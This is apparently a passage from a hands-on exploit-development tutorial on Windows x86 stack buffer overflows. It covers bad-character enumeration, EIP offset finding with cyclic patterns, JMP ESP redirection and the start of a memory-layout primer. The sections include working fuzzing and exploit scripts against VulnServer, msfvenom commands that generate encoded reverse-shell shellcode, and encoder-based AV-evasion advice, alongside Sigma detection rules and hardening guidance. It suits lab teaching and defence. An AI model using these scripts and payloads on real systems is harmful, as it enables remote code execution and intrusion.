buf      = b"A" * offset
buf     += b"B" * 4                 # EIP overwrite marker
buf     += bytes(badchar_test)      # byte array lands at ESP
buf     += b"C" * (3000 - len(buf)) # padding

You then deliver that buffer to the vulnerable service running under a debugger:

import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.56.10", 9999))
s.recv(1024)
s.send(b"TRUN /.:/" + buf)          # VulnServer TRUN command
s.close()

After the crash, the \x01–\xFF block should appear contiguously in memory, typically at or near ESP.

5. Inspecting Memory: Immunity Debugger and mona.py

In Immunity Debugger, follow ESP in the hex dump and use the mona plugin to diff what you sent against what landed.

!mona config -set workingfolder c:\mona\%p
!mona bytearray -cpb "\x00"
!mona compare -f c:\mona\bytearray.bin -a <ESP_address>

!mona config sets the output directory.
!mona bytearray -cpb "\x00" writes a reference bytearray.bin (all \x01–\xFF) excluding the specified bad chars.
!mona compare diffs the reference file against the live memory at the supplied ESP address and prints a per-byte verdict.

Annotated mona output looks like:

[+] Comparing with memory at address 0x00ab1a30
    Only the first 18 bytes were identical
    Possibly bad chars: 0a 0d
[+] Bytes omitted from input: ...
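The comparison mona performs can be approximated outside the debugger once the memory at ESP has been dumped to bytes. This is a rough sketch of the idea, not mona's implementation; first_divergence is a hypothetical helper and the observed value is simulated.

```python
def first_divergence(expected: bytes, observed: bytes):
    """Return the index where observed stops matching expected, or None if intact."""
    for i, want in enumerate(expected):
        if i >= len(observed) or observed[i] != want:
            return i
    return None

expected = bytes(range(1, 256))
observed = expected[:9]          # simulated dump: the copy stopped on reaching \x0a

idx = first_divergence(expected, observed)
print(f"identical bytes: {idx}, first suspect: \\x{expected[idx]:02x}")
```

The index doubles as the count of identical leading bytes, which is the figure mona reports before it lists suspects.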

6. Iterative Elimination: Narrowing the Bad List

Mona flags where the sequence diverges. The critical nuance: only the first byte of a corrupted run is necessarily bad. Subsequent corruption is often a knock-on effect of that first offender shifting alignment.

If memory shows 11 12 13 15 with 14 missing, then \x14 is the only confirmed bad character at that step — not \x15 or anything after it. Add \x14 to your exclusion list, regenerate, and re-run:

BADCHARS = b"\x00\x0a\x0d"          # grows one confirmed byte per pass

full = bytearray(range(1, 256))
test = bytes(b for b in full if b not in BADCHARS)

# rebuild buffer with `test`, resend, re-inspect under the debugger

Repeat the send → inspect → eliminate cycle until the entire \x01–\xFF block (minus the confirmed bad bytes) appears intact at ESP. Mirror the same exclusion list in !mona bytearray -cpb "..." so the reference file matches.
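The whole cycle can be rehearsed offline against a stand-in for the service. In this sketch simulated_target is entirely hypothetical (it drops \x0a and stops copying at \x0d); against a real target, that call would be replaced by a send followed by a memory dump from the debugger.

```python
def simulated_target(data: bytes) -> bytes:
    """Hypothetical stand-in for the service: drops 0x0A and stops at 0x0D."""
    out = bytearray()
    for b in data:
        if b == 0x0D:
            break
        if b != 0x0A:
            out.append(b)
    return bytes(out)

def first_divergence(expected: bytes, observed: bytes):
    """Index of the first mismatch (or early end), None if intact."""
    for i, want in enumerate(expected):
        if i >= len(observed) or observed[i] != want:
            return i
    return None

bad = {0x00}                      # start with the null byte excluded
while True:
    test = bytes(b for b in range(1, 256) if b not in bad)
    idx = first_divergence(test, simulated_target(test))
    if idx is None:               # array survived intact: enumeration is done
        break
    bad.add(test[idx])            # only the first offender is confirmed per pass

print(sorted(f"\\x{b:02x}" for b in bad))
```

Each pass confirms exactly one byte, which mirrors the rule that later corruption in the same run proves nothing.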

Cyclic flow diagram of the iterative bad-character elimination process: generate byte array, send, crash and inspect, diff with mona, confirm bad byte, add to exclusion list, and repeat until the array is intact — Only the first byte of a corrupted run is confirmed bad — iterate the send-diff-eliminate loop until the full array survives intact in memory.

7. Encoding Shellcode with msfvenom

Once the bad-char set is known, generate shellcode that avoids it. msfvenom’s -b flag specifies the forbidden bytes; msfvenom then picks an encoder (x86/shikata_ga_nai by default) to re-encode around them.

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.56.1 LPORT=443 \
  -b '\x00\x0a\x0d\x20' -e x86/shikata_ga_nai -f python

x86/shikata_ga_nai (ranked excellent) is a polymorphic XOR additive-feedback encoder. It reorders instructions and dynamically selects registers, producing different output each run and frustrating signature-based detection.

Size overhead is real. Encoding inflates the payload — a 71-byte stub can grow to 98 bytes after one shikata_ga_nai pass. Account for buffer space accordingly.

Failure case: when the bad-char list is too restrictive, shikata_ga_nai may abort with "A valid opcode permutation could not be found". Fall back to an alternative encoder:

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.56.1 LPORT=443 \
  -b '\x00\x0a\x0d\x20\xff' -e x86/call4_dword_xor -f python

x86/call4_dword_xor and x86/countdown use different decoder stubs that may satisfy tighter constraints.

Hierarchy diagram showing how a known bad-character set feeds into msfvenom which selects between shikata_ga_nai as default, call4_dword_xor as fallback, and alpha_mixed for printable-only constraints, all producing encoded shellcode — msfvenom encoder selection is driven by the bad-char list — escalate through fallback encoders when the default cannot find a valid opcode permutation.

8. Alphanumeric and Printable-Only Constraints

When so many bytes are forbidden that standard encoders fail, switch to printable-ASCII-only output. x86/alpha_mixed (msfvenom) and the standalone Alpha2 tool emit alphanumeric shellcode, which stays inside the \x21–\x7E printable range and suits targets that only pass printable URI characters.

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.56.1 LPORT=443 \
  -e x86/alpha_mixed BufferRegister=ESP -f python

The BufferRegister option tells the decoder which register points to the payload, removing the self-locating GetPC stub. The trade-off is size — an alphanumeric payload can balloon to 710 bytes or more. When the available buffer cannot hold an inflated payload, stage a small egghunter to search memory for a larger second-stage payload placed elsewhere.
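Whether a blob really satisfies an alphanumeric-only constraint is easy to verify before sending. The check below is a small sketch; non_alnum_offsets is an illustrative name and the sample inputs are placeholders, not encoder output.

```python
import string

ALNUM = set((string.ascii_letters + string.digits).encode("ascii"))

def non_alnum_offsets(blob: bytes) -> list:
    """Return the offsets of bytes that fall outside A-Z, a-z, 0-9."""
    return [i for i, b in enumerate(blob) if b not in ALNUM]

print(non_alnum_offsets(b"ABCdef123"))        # clean placeholder input
print(non_alnum_offsets(b"AB\x90cd\x00"))     # two offending bytes
```

The same function works from the defender's side: an unusually long, purely alphanumeric run in a field that normally carries short values is worth a closer look.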

9. Instruction Substitution: Jumping Without Bad Opcodes

Sometimes the bad character lives in your jump opcode, not your shellcode body. The short JMP maps to \xEB, and \xEB is frequently bad in HTTP and other network-protocol targets — so the instruction cannot be used as-is.

Instruction	Opcode bytes	Notes
`JMP SHORT +6`	`\xEB \x06`	`\xEB` often restricted
`JE / JNE` pair	`\x74 .. \x75 ..`	Complementary branches to the same target; exactly one is always taken
Near `JMP`	`\xE9 .. .. .. ..`	Alternative when `\xEB` is bad

A bad-char-safe substitution uses a conditional pair that, regardless of the zero flag, always transfers control:

    ; JMP SHORT replacement using complementary conditionals
    je  short target     ; 74 xx  -> jump if ZF=1
    jne short target     ; 75 xx  -> jump if ZF=0
    ; one branch is always taken; no \xEB byte present
target:
    ; decoder / shellcode continues here

In SEH overwrites, the 4-byte nSEH field typically holds a JMP SHORT that hops over the adjacent handler pointer into the payload, so its opcode bytes must also dodge the bad-char set. Use mona or WinDbg to locate suitable jump equivalents and clean POP POP RET gadgets.
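The two displacements in the pair differ because each rel8 operand is measured from the end of its own 2-byte instruction. The arithmetic can be sketched as follows; je_jne_pair is a hypothetical helper, and the distance of 4 assumes a single 4-byte field sits between the pair and the target.

```python
def je_jne_pair(distance: int) -> bytes:
    """Encode 'je target; jne target' where target lies `distance` bytes
    past the end of the 4-byte pair."""
    if not 0 <= distance <= 125:
        raise ValueError("forward rel8 displacement out of range")
    # je ends 2 bytes before the pair does, so its displacement is 2 larger.
    return bytes([0x74, distance + 2, 0x75, distance])

pair = je_jne_pair(4)   # assumption: one 4-byte field to hop over
print(" ".join(f"{b:02x}" for b in pair))
```

The result fills exactly four bytes and contains no \xEB, at the cost of introducing \x74 and \x75, which must themselves be checked against the bad-char list.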

10. Unicode / Wide-Character Transformations

A distinct constraint class: some applications convert input via MultiByteToWideChar() (Win32) or mbstowcs() (CRT), expanding each byte to a wide character and effectively inserting a null after every byte. This breaks shellcode alignment entirely — it is transformation, not stripping.

# You send:        \x41\x42
# Memory shows:    \x41\x00\x42\x00   <- every odd byte zeroed
sent     = b"\x41\x42"
observed = b"\x41\x00\x42\x00"        # Unicode expansion in the debugger

A naive \x01–\xFF array will look catastrophically corrupted under this transformation because every byte appears null-padded. The classical mitigation is Venetian shellcode — manually constructed so that the injected null bytes become harmless padding instructions, letting the real opcodes survive expansion. Identify these buffers by spotting the regular \x00 interleave in the hex dump.
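The interleave is simple to reproduce and to test for. The sketch below models the conversion for 7-bit ASCII input only (bytes from 0x80 upward map according to the active code page, which is not modelled here); widen and looks_widened are illustrative names.

```python
def widen(data: bytes) -> bytes:
    """Model an ANSI-to-UTF-16LE conversion for bytes 0x00-0x7F."""
    return data.decode("ascii").encode("utf-16-le")

def looks_widened(dump: bytes) -> bool:
    """True if every second byte is null, the regular interleave seen in the hex dump."""
    return len(dump) >= 4 and len(dump) % 2 == 0 and all(b == 0 for b in dump[1::2])

print(widen(b"\x41\x42"))
print(looks_widened(widen(b"ABCD")), looks_widened(b"ABCD"))
```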

11. Common Attacker Techniques

Technique	Description
Bad-char enumeration	Inject `\x01`–`\xFF`, diff memory, identify forbidden bytes
Shellcode encoding	Re-encode with `shikata_ga_nai` / `call4_dword_xor` to avoid bad bytes
Alphanumeric shellcode	`alpha_mixed` / Alpha2 for printable-only constraints
Jump substitution	Replace `\xEB` with `JE/JNE` pairs or near `JMP`
Venetian shellcode	Survive Unicode expansion in wide-character buffers
Egghunter staging	Small finder stub locating a larger payload in tight buffers

These are pre-exploitation tradecraft: they enable shellcode delivery, but execution and payload behavior are what generate detectable telemetry.

12. Defensive Strategies & Detection

Bad-char testing itself is quiet, but the encoded shellcode it produces is loud once it executes from unbacked memory.

Event ID	Name	Relevance
`1`	Process Creation	Frameworks (Metasploit, Empire) launching payloads
`3`	Network Connection	Outbound C2 from an exploited process
`8`	CreateRemoteThread	Post-exploitation thread injection
`10`	ProcessAccess	Cross-process open by injected payload
`11`	FileCreate	Shellcode or payload dropped to disk

Sysmon Event ID 10 (ProcessAccess) is the primary signal. When shellcode running from anonymous stack or heap memory opens a handle to another process, the resulting event carries a CallTrace containing UNKNOWN frames: code with no backing image on disk.

title: Shellcode Injection via Suspicious Process Access
logsource:
  category: process_access
  product: windows
detection:
  selection:
    EventID: 10
    GrantedAccess:
      - '0x147a'
      - '0x1f3fff'
    CallTrace|contains: 'UNKNOWN'
  condition: selection
level: high
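For triage outside a SIEM, the rule's selection logic can be applied to parsed events in a script. This is a sketch under assumptions: events are plain dicts keyed by Sysmon field names, and both sample events are hand-written for illustration rather than taken from real logs.

```python
SUSPICIOUS_ACCESS = {"0x147a", "0x1f3fff"}   # masks copied from the rule above

def matches_rule(event: dict) -> bool:
    """Mirror the rule: EID 10, a listed access mask, UNKNOWN in CallTrace."""
    granted = str(event.get("GrantedAccess", "")).lower()
    trace = str(event.get("CallTrace", "")).upper()
    return event.get("EventID") == 10 and granted in SUSPICIOUS_ACCESS and "UNKNOWN" in trace

# Hypothetical events for illustration only.
injected = {"EventID": 10, "GrantedAccess": "0x1F3FFF",
            "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d4c4|UNKNOWN(0000000002A30F2E)"}
benign = {"EventID": 10, "GrantedAccess": "0x1000",
          "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d4c4|C:\Windows\System32\KERNELBASE.dll+2c13e"}

print(matches_rule(injected), matches_rule(benign))
```

Expect to tune the access-mask list per environment; some legitimate software also requests broad access.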

Additional telemetry and hardening:

ETW — subscribe to Microsoft-Windows-Threat-Intelligence (ETWTI) to observe injection and memory manipulation; Microsoft-Windows-Security-Auditing for process audit events.
Audit Process Creation (Detailed Tracking) → Security Event 4688 with command-line logging captures framework invocations.
WAF / network — flag URI patterns carrying buffer-overflow payloads; a burst of access-violation or segfault alerts in a short window signals active exploitation attempts.
Compiler mitigations — /GS, /SAFESEH, /DYNAMICBASE, /NXCOMPAT raise the exploitation bar.
Input validation — allowlist legal characters at the boundary; explicitly reject \x00, \x0A, \x0D.
WDEG — enforce DEP and CFG per-process via Set-ProcessMitigation.
Memory integrity — flag executable pages not backed by a known on-disk image.
Deploy Sysmon with a community baseline (SwiftOnSecurity, olafhartong sysmon-modular) to ensure EID 10 captures CallTrace.

Hierarchy diagram mapping an exploit attempt to four detection and mitigation layers: network WAF, OS mitigations like DEP and CFG, Sysmon Event ID 10 with unknown CallTrace, ETWTI injection telemetry, and Security Event 4688 process creation logging — Defence-in-depth layers each intercept exploitation at a different stage — encoded shellcode evades transport filters but generates unmistakable runtime telemetry.

13. Tools for Bad-Character Analysis

Tool	Description	Link
Immunity Debugger	Crash analysis, ESP dump inspection	immunityinc.com
mona.py	Bytearray generation and memory comparison	github.com/corelan
WinDbg	Opcode/gadget inspection, memory diffing	microsoft.com
msfvenom	Shellcode generation and encoding (`-b`)	offsec.com
Alpha2	Standalone alphanumeric shellcode encoder	github.com
x64dbg	User-mode debugging and patching	x64dbg.com
Ghidra	Static opcode/disassembly analysis	ghidra-sre.org
Volatility	Memory forensics, unbacked code regions	volatilityfoundation.org

14. MITRE ATT&CK Mapping

Bad-char testing and shellcode crafting are pre-exploitation tradecraft with no standalone technique ID — they enable the techniques below.

Technique	MITRE ID	Detection
Exploitation for Client Execution	`T1203`	Process crash bursts, EID `1` framework launches
Exploit Public-Facing Application	`T1190`	WAF anomalies, service access violations
Exploitation for Privilege Escalation	`T1068`	Local overflow → elevated process behavior
Obfuscated Files or Information	`T1027`	Encoder signatures (shikata/alpha) on disk/wire
Process Injection	`T1055`	Sysmon EID `8`/`10`, `UNKNOWN` in `CallTrace`

Summary

Bad characters are application-defined bytes that corrupt, truncate, or transform shellcode before it lands in memory; enumerate them empirically, never assume.
\x00 is always bad in string-based overflows because CRT functions like strcpy and strlen treat it as the terminator; sockets pass it but downstream string APIs still die on it.
Enumerate with a \x01–\xFF byte array, diff memory using !mona compare, and remember only the first byte of a corrupted run is confirmed bad.
Adapt with msfvenom -b encoding (shikata_ga_nai, falling back to call4_dword_xor or alpha_mixed), jump-opcode substitution, and Venetian shellcode for Unicode buffers.
Detect the resulting payloads via Sysmon Event ID 10 with UNKNOWN CallTrace frames, ETWTI injection telemetry, and process-creation auditing (4688).


Finding the EIP Offset: Pattern Creation and Cyclic Patterns

Objective: Understand how to determine the exact EIP overwrite offset in a classic x86 stack-based buffer overflow by sending a cyclic (De Bruijn-derived) pattern, reading the value loaded into EIP at crash time, and calculating the precise byte distance from the buffer’s start to the saved return address — a repeatable, tool-agnostic workflow for authorized lab use.

1. Prerequisites and Lab Setup

This workflow assumes an isolated, authorized lab VM — never a production host. The classic offset-finding exercise targets a purpose-built vulnerable service such as vulnserver.exe or brainpan.exe, attached to a debugger.

You will need:

Component	Role
Immunity Debugger	Attach to the target process and read register state at crash time.
`mona.py`	Pattern generation and offset search inside Immunity.
Kali + Metasploit	`msf-pattern_create` / `msf-pattern_offset` wrappers.
Python 3 (+ pwntools)	Scripted fuzzing, pattern delivery, and `cyclic()` math.

Attach Immunity to the running service (File → Attach), press F9 to resume, then drive input from your Python script across the network. Configure mona’s working folder first:

!mona config -set workingfolder c:\mona\%p

2. The x86 Stack Frame: Why EIP Is the Target

EIP (Extended Instruction Pointer) is the 32-bit register holding the address of the next instruction. On function return, the ret instruction pops the saved return address off the stack into EIP. If you can overwrite that saved value, you control where execution flows next.

On a standard MSVC/GCC x86 cdecl frame, the layout is:

[  local buffer (N bytes)  ]   <- lower address, ESP near here on entry
[  saved EBP (4 bytes)     ]
[  saved EIP (4 bytes)     ]   <- overwrite target
[  function arguments      ]   <- higher address

The saved EIP sits above the saved EBP in the stack image. The offset is the byte distance from byte 0 of your input buffer to the first byte of saved EIP. ESP matters too: after ret, ESP advances past the popped return address and typically points directly into your attacker-controlled buffer region — the basis for later JMP ESP stages.
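The offset arithmetic can be checked against a toy model of the frame. The sketch below assumes an idealised layout with no padding and no stack cookie; LOCAL_BYTES and the two saved values are hypothetical.

```python
import struct

LOCAL_BYTES = 64   # hypothetical buffer size; real frames may add padding or a cookie

# Frame image from low to high address: buffer, saved EBP, saved EIP.
frame = bytearray(LOCAL_BYTES) + struct.pack("<II", 0x0019FF70, 0x00401234)

offset = LOCAL_BYTES + 4              # skip the buffer and the 4-byte saved EBP
data = b"A" * offset + b"BBBB"        # input longer than the buffer
frame[:len(data)] = data              # model of an unbounded copy

(saved_eip,) = struct.unpack_from("<I", frame, offset)
print(hex(saved_eip))
```

On a real target the distance is rarely this tidy, which is why the offset is measured with a pattern rather than derived from the source.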

Diagram of x86 cdecl stack frame showing input buffer overflowing through local variables and saved EBP into the saved EIP return address, with ESP position after ret indicated — The saved EIP sits just above the saved EBP — overflowing the input buffer upward overwrites it and redirects execution.

3. From Fuzzing to Approximate Crash Size

The prior stage — fuzzing — delivers progressively larger buffers of A bytes (\x41) until the service dies. When the debugger shows EIP = 41414141, the saved return address has been fully overwritten with As. That confirms EIP control but tells you nothing about where in the buffer EIP lands.

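import socket, time

ip, port = "192.168.56.10", 9999
size = 100
last_sent = 0                                      # size of the most recent buffer delivered
while True:
    try:
        with socket.create_connection((ip, port), timeout=5) as s:
            s.recv(1024)                           # read the service banner first
            s.sendall(b"TRUN /.:/" + b"A" * size)  # protocol-specific prefix
            last_sent = size
            print(f"[*] Sent {size} bytes")
        size += 100
        time.sleep(1)                              # give the service time to fall over
    except OSError:
        # Connect, recv, or send failed: the service most likely died on the last buffer
        print(f"[!] Crash at or just after {last_sent} bytes")
        break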

Round the crash size up to a clean number — say 2000 bytes. That value becomes the pattern length.

4. The Mathematics of Cyclic Patterns

EIP = 41414141 is ambiguous because every byte is identical. The fix is a cyclic pattern: a string in which every fixed-length substring appears exactly once. Find which substring landed in EIP, and you have the offset.

Concept	Detail
De Bruijn sequence	A sequence where every possible subsequence of a fixed length appears exactly once. This uniqueness is what makes offset lookup deterministic.
Why it works	The overwriting bytes are popped into EIP on `ret`. Because each 4-byte window is unique, the EIP value maps to exactly one position in the input.
Metasploit variant	Metasploit patterns use a different algorithm than true De Bruijn but serve the same purpose, drawing from uppercase letters, lowercase letters, and digits.
3-char uniqueness	`pattern_create` produces a string where every three-character substring is unique: `Aa0Aa1Aa2Aa3Aa4...`.

pwntools cyclic() generates a true De Bruijn sequence; msf-pattern_create uses the alphabet-based approach. Both yield a unique mapping you can query.
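The alphabet-based construction is short enough to reproduce for inspection. The sketch below generates upper/lower/digit triples in order, which matches the Aa0Aa1Aa2 prefix shown in the table; it is an illustration of the idea, not Metasploit's source, and pattern_create here is a local function name.

```python
from itertools import product
from string import ascii_uppercase, ascii_lowercase, digits

def pattern_create(length: int) -> bytes:
    """Concatenate upper/lower/digit triples in order: Aa0Aa1Aa2..."""
    triples = ("".join(t) for t in product(ascii_uppercase, ascii_lowercase, digits))
    return "".join(triples)[:length].encode("ascii")

pattern = pattern_create(2000)

# Every 4-byte window should occur once, so an EIP value maps to one offset.
windows = [pattern[i:i + 4] for i in range(len(pattern) - 3)]
print(pattern[:15].decode(), len(windows) == len(set(windows)))
```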

Flow diagram showing the complete cyclic pattern offset-finding workflow from initial fuzzing crash through pattern generation, delivery, EIP value capture, offset calculation, and BBBB verification — A De Bruijn cyclic pattern makes every 4-byte window unique, collapsing the offset problem to a single deterministic lookup.

5. Generating the Pattern: Three Tool Paths

Generate a pattern equal to (or slightly larger than) the crash size. The -l flag is length; the -q flag (used in section 7) is the query value.

Metasploit (Bash):

# Generate a 2000-byte non-repeating pattern
msf-pattern_create -l 2000
# Or the script directly:
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 2000

mona.py (Immunity command bar):

!mona pc 2000

pwntools (Python 3):

from pwn import *
pattern = cyclic(2000)
print(pattern)

Tip: Generate a pattern 400 bytes larger than the crash buffer to also reveal whether shellcode space exists immediately after the EIP overwrite.

6. Sending the Pattern and Capturing the EIP Value

Replace the A buffer in your fuzzing script with the generated pattern, reattach Immunity, and reproduce the crash.

import socket

pattern = b"Aa0Aa1Aa2Aa3Aa4..."   # paste msf-pattern_create -l 2000 output
ip, port = "192.168.56.10", 9999

with socket.create_connection((ip, port)) as s:
    s.send(b"TRUN /.:/" + pattern)

When the process faults, read the 4-byte EIP value from Immunity’s register panel — for example 6F43396E.

Little-endian note: Values are written to the stack least-significant-byte first. A debugger may display the register as 6F43396E. Tools like pattern_offset handle endianness internally, so pass the displayed value as-is. A manual ASCII lookup, however, requires reversal: 6F43396E → 6E39436F → n9Co.
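The manual lookup can be scripted to make the byte reversal explicit. This sketch rebuilds the upper/lower/digit pattern locally (an approximation of the Metasploit output, assumed here to match it) and searches for the EIP value after packing it little-endian.

```python
import struct
from itertools import product
from string import ascii_uppercase, ascii_lowercase, digits

# Locally rebuilt 2000-byte pattern: Aa0Aa1Aa2...
pattern = "".join(
    "".join(t) for t in product(ascii_uppercase, ascii_lowercase, digits)
)[:2000].encode("ascii")

eip = 0x6F43396E                   # value as displayed in the register panel
needle = struct.pack("<I", eip)    # the same four bytes in memory order
offset = pattern.find(needle)

print(needle, offset)
```

Packing with "<I" performs the reversal, so the displayed value can be used directly without reordering it by hand.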

7. Calculating the Exact Offset

Feed the EIP value into any of the three tools. All return the same byte distance.

Metasploit (Bash):

# -q is the query switch; pass the EIP value from the debugger
msf-pattern_offset -l 2000 -q 6F43396E
# Output:
# [*] Exact match at offset 1978

mona.py (Immunity): findmsp searches every register and the stack against the pattern.

!mona findmsp -distance 2000

Read the log line:

EIP contains normal pattern : ... (offset 1978)

(!mona po 6F43396E performs the same lookup by hex value.)

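pwntools (Python 3): cyclic_find accepts the packed 4-byte value. The value must come from a crash triggered with a cyclic() pattern; the Metasploit-pattern value 6F43396E used above belongs to a different sequence and will not resolve here.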

from pwn import *
offset = cyclic_find(p32(0x6161616c))   # value read from EIP
print(offset)                            # -> integer byte offset

gdb-peda’s pattern_search reports the EBP, EIP, and ESP offsets at once on Linux targets (e.g. EIP+0 found at offset: 1040 and [ESP] --> offset 1044), which is useful for spotting where ESP lands relative to EIP.

8. Verifying EIP Control

Never trust a calculated offset blindly. Confirm it by overwriting EIP with a known marker. Set payload to empty and retn to "BBBB":

import socket

prefix   = b"TRUN /.:/"
offset   = 1978
overflow = b"A" * offset
retn     = b"BBBB"          # 0x42424242
payload  = b""              # no payload yet — verification only

buf = prefix + overflow + retn + payload

with socket.create_connection(("192.168.56.10", 9999)) as s:
    s.send(buf)

Reload the app in Immunity and re-send. If the offset is correct, EIP shows 42424242, the hex of “BBBB”. You now control execution flow exactly. To confirm that ESP also points into your buffer, set payload to a short run of "C" bytes and re-send: those bytes follow retn, so ESP should point at them, and that location becomes your future code-redirect landing zone.

The conceptual stack image after the overwrite:

[ AAAA AAAA ... AAAA ]   offset bytes filling buffer + saved EBP
[ BBBB ]                 saved EIP = 0x42424242  (controlled)
[ CCCC ... ]             ESP region (future shellcode space)

Diagram of stack after controlled EIP overwrite showing padding bytes up to the exact offset, BBBB value in saved EIP slot, and ESP pointing to the attacker-controlled region immediately after — EIP showing 0x42424242 confirms the offset is exact; ESP now points into your buffer, establishing the foundation for a JMP ESP redirect.

9. Common Pitfalls and Edge Cases

Pattern shorter than the real offset: EIP holds bytes from beyond your pattern; the offset tool returns no match. Regenerate longer.
Bad characters: Bytes like \x00, \x0a, \x0d can truncate or corrupt the pattern mid-stream, shifting EIP unpredictably. Bad-char analysis is a separate stage.
Modern mitigations: ASLR and DEP/NX invalidate the naive EIP→ESP→shellcode chain on hardened targets. The offset still exists, but exploitation requires bypasses (covered in later tutorials).
SEH-based overflows: When the buffer overruns the Structured Exception Handler instead of the saved return address, EIP may not show pattern bytes directly — !mona findmsp will instead report the offset to the SEH/nSEH records.

10. Common Attacker Techniques

Offset discovery is a development sub-step that feeds the techniques below.

Technique	Description
Stack buffer overflow	Overrun a fixed local buffer to overwrite the saved return address.
Cyclic pattern offset finding	Deterministically locate the EIP overwrite distance, as taught here.
EIP redirection via `JMP ESP`	Once the offset is known, replace `retn` with the address of a `JMP/CALL ESP` gadget.
SEH overwrite	Variant overflow that hijacks the exception handler chain instead of `ret`.

11. Defensive Strategies and Detection

Detection splits into two contexts: catching exploitation attempts against a service, and catching the crash-loop behaviour of fuzzing/pattern delivery.

Crash and process telemetry:

Application Error — Event ID 1000 (Application log): logged on 0xC0000005 (Access Violation) when EIP corruption kills the process; the faulting address is the pattern value (e.g. 0x41307241).
Windows Error Reporting — Event ID 1001: WER bucket data, faulting instruction pointer, and dump path for post-crash forensics.
Sysmon Event ID 3 (Network Connection): repeated high-rate TCP connections to a single service port during fuzzing and pattern delivery are anomalous — watch DestinationPort and SourceIp.
Sysmon Event ID 1 (Process Create): child processes spawned if the overflow reaches code execution — inspect CommandLine, ParentImage, IntegrityLevel.

ETW providers: Microsoft-Windows-WER-SystemErrorReporting emits access-violation crash events; Microsoft-Windows-Kernel-Process reveals abnormal crash-and-restart loops via process start/stop events. Forward both to a SIEM.

A repeated-crash detection sketch (illustrative):

title: Repeated Application Crash Loop (Possible Buffer Overflow Fuzzing)
logsource:
  product: windows
  service: application
detection:
  selection:
    EventID: 1000
    ExceptionCode: '0xc0000005'   # Access Violation
  timeframe: 1m
  condition: selection | count() > 5   # repeated crashes = fuzzing indicator
level: high
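The same threshold logic can be prototyped over exported event timestamps before committing it to a SIEM rule. This is a sketch under assumptions: crash_burst is a hypothetical helper, the timestamps are synthetic, and the window and threshold mirror the one-minute, more-than-five values in the rule above.

```python
from datetime import datetime, timedelta

def crash_burst(timestamps, window=timedelta(minutes=1), threshold=5):
    """Return True if more than `threshold` crashes fall inside any window."""
    times = sorted(timestamps)
    start = 0
    for end, t in enumerate(times):
        while t - times[start] > window:   # slide the window's left edge forward
            start += 1
        if end - start + 1 > threshold:
            return True
    return False

base = datetime(2024, 1, 1, 12, 0, 0)      # synthetic event times
fuzzing = [base + timedelta(seconds=5 * i) for i in range(8)]
sporadic = [base + timedelta(minutes=10 * i) for i in range(8)]

print(crash_burst(fuzzing), crash_burst(sporadic))
```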

Hardening checklist (raises the bar from “find the bug” to “bypass every mitigation”):

Compile with /GS stack security cookies — a mismatch triggers __security_check_cookie() and terminates before ret.
Enable DEP/NX system-wide: bcdedit /set nx AlwaysOn.
Enable ASLR: HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\MoveImages = 1.
Compile with Control Flow Guard: /guard:cf.
Link with SafeSEH (/SAFESEH) to block SEH overwrites on x86.
Replace unbounded strcpy, gets, scanf("%s", ...) with strcpy_s, strncpy_s, gets_s.
Run Application Verifier with heap and stack checks during development.

These map to MITRE mitigation M1050 — Exploit Protection.

12. Tools for Offset Analysis

Tool	Description	Link
`msf-pattern_create` / `pattern_create.rb`	Generate a non-repeating pattern of length `-l`.	metasploit.com
`msf-pattern_offset` / `pattern_offset.rb`	Query offset with `-q <EIP_HEX>`.	metasploit.com
mona.py	`!mona pc`, `!mona findmsp`, `!mona po` inside Immunity.	github.com
Immunity Debugger	Attach, reproduce crash, read EIP/ESP.	immunityinc.com
pwntools	`cyclic()` / `cyclic_find()` De Bruijn math.	github.com
GDB + PEDA	`pattern_search` reports EBP/EIP/ESP offsets.	github.com

13. MITRE ATT&CK Mapping

Offset finding is a pre-exploitation development sub-step with no dedicated technique ID; it supports the techniques below.

Technique	MITRE ID	Detection
Exploitation for Client Execution	`T1203`	Crash telemetry (Event ID 1000), anomalous child processes (Sysmon ID 1).
Exploitation for Privilege Escalation	`T1068`	Access-violation crashes in privileged services; WER buckets.
Exploit Public-Facing Application	`T1190`	High-rate TCP to a service port (Sysmon ID 3); crash loops.
Exploitation for Defense Evasion	`T1211`	Memory-corruption indicators; EDR memory hooks.
Exploit Protection (Mitigation)	`M1050`	DEP, ASLR, CFG, `/GS`, SafeSEH.

Summary

The EIP offset is the exact byte distance from your buffer’s start to the saved return address — and a cyclic pattern finds it deterministically.
A De Bruijn / Metasploit pattern makes every fixed-length window unique, so the value popped into EIP maps to a single position.
Generate with msf-pattern_create, !mona pc, or cyclic(); resolve with msf-pattern_offset -q, !mona findmsp, or cyclic_find().
Verify by overwriting EIP with "BBBB" and confirming EIP = 42424242; remember little-endian display order.
Defenders catch the activity via Event ID 1000 (0xC0000005) crash loops and Sysmon Event ID 3 connection floods; M1050 controls (DEP, ASLR, CFG, /GS) raise the exploitation bar dramatically.


Classic Stack Buffer Overflow: Smashing the Stack on Windows

Objective: Understand how a classic stack-based buffer overflow corrupts a Windows x86 call frame, hijacks the saved EIP, and redirects execution through a JMP ESP trampoline — and how /GS, SafeSEH, SEHOP, DEP, and ASLR defeat or complicate it, so you can detect and defend against this vulnerability class in authorized lab work.

1. Windows Memory Layout Primer

Every Windows process runs inside a private virtual address space. On x86 (32-bit), that space spans 0x00000000–0x7FFFFFFF for user mode. The stack grows downward (high to low addresses) and stores function call frames; the heap grows upward and serves dynamic allocations.

The CPU tracks two stack-relevant registers and one execution register:

ESP — stack pointer, the current top of stack.
EBP — base/frame pointer, anchors the current frame.
EIP — instruction pointer, the address of the next instruction. This is the attacker’s target.

A CALL instruction pushes the return address (the next EIP) onto the stack and jumps to the target. The matching RET pops that saved address back into EIP. If an attacker overwrites the saved return address on the stack, RET transfers control wherever they choose.

x86 is little-endian: the address 0x625011AF is written in the payload as the byte sequence \xAF\x11\x50\x62. This byte ordering matters for every address you place into an exploit buffer.
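Packing by hand invites transposition errors, so the conversion is usually delegated to a library. A minimal sketch using Python's struct module with the address from the example above:

```python
import struct

addr = 0x625011AF
packed = struct.pack("<I", addr)          # "<I" = little-endian unsigned 32-bit
(roundtrip,) = struct.unpack("<I", packed)

print(" ".join(f"{b:02x}" for b in packed), hex(roundtrip))
```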

